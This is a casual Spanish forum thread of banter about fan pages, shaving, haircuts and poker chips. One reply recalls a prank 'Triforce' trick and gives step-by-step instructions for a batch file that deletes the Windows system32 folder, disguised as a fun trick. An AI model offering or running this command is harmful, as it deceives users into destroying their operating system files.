#6832 yo he hecho lo propio contigo enkripted!
HAHAHA
Yo me quedo con
Carlos became a fan of Sergio Dharma.
Carlos became a fan of La Dharma y el Vagabundo.
Y tambien me hice fan de LOST del rio, pero no lo encontraba xD
Luego hay más...
Locke diga la rubia, Locke el viento se llevó...
Chuleta de cerdooooooooooooo FTW. O en su defecto Rancho canario + Garbanzas compuestas.
#6844 JAJAJAJAJAJJAJAJAJAJA LOST del rio xDDDDDDDDDDDDD
Venga otro truco:
Mantén presionado a la vez la tecla WINDOWS+E durante al menos 30 segundos, sin soltar.
Enjoy your free RAM
Este post va de dos cosas, una, consejo y otra favor .
Consejo: Debería afeitarme?
Favor: Firmar esto, tenéis la explicación dentro. gracias.
Eso me recuerda a la thread del triforce...
Abrir un Notepad
Teclear:
@echo off
del c:\WINDOWS\system32
- Guardar como Triforce.bat (no en modo texto y si en todos los archivos)
Pues yo llevo barba de 2-3 días, ¿deberia de afeitarme chilvy? Sé de buena mano que os gustan las barbitas de 3 días xDD
#6856 Vaya jungla tío, afeitate de una vez.
#6856 Joder, ha sido ver la foto en medio segundo y pensar: codo o culo?
Una cosa que me jode de algunas tías:
Foto de un Bradd Pitt random con barba: woooow, buenísimo que está, le queda genial la barba, etc etc...
Uno no se afeita: joder, afeitate ya que pica y estás más guapo... :¬¬:
El rollo es ese que no me sale el suficiente pelo en la barba como para patillas y es el asco, pero si fuese por eso, siempre voy rapado + barbita como la tengo ahora xd
#6865 Buenos días, voy a pedir el maletín estoy mirando otros que no se piren mucho de precio, por si me gusta alguno, ahora te iré diciendo,
Yo también tengo el pelo bastante corto, al 1 por todos sitios, excepto por arriba, que me hago un peinado a lo de CR9 xD, y las patillas me las afeite hace 3 días
Qué bastos sois los tíos xDDDDDD... Yo o iba rapado al 1 o me dejaba el pelo militar americano, 1 abajo y arriba algo crecidito, hasta que me cansé. Rapado for all, 1 vez a la semana y YATTA.
#6866 las mejores fichas después de las de cerámica (valen un pastizal) son las metal insert, a mi me vuelven loco y no son muy caras xD